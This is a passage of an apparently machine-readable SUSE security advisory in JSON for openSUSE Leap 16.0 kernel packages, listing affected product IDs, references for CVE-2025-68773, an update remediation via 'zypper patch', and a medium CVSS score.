"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68773",
"url": "https://www.suse.com/security/cve/CVE-2025-68773"
},
{
"category": "external",
"summary": "SUSE Bug 1256586 for CVE-2025-68773",
"url": "https://bugzilla.suse.com/1256586"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
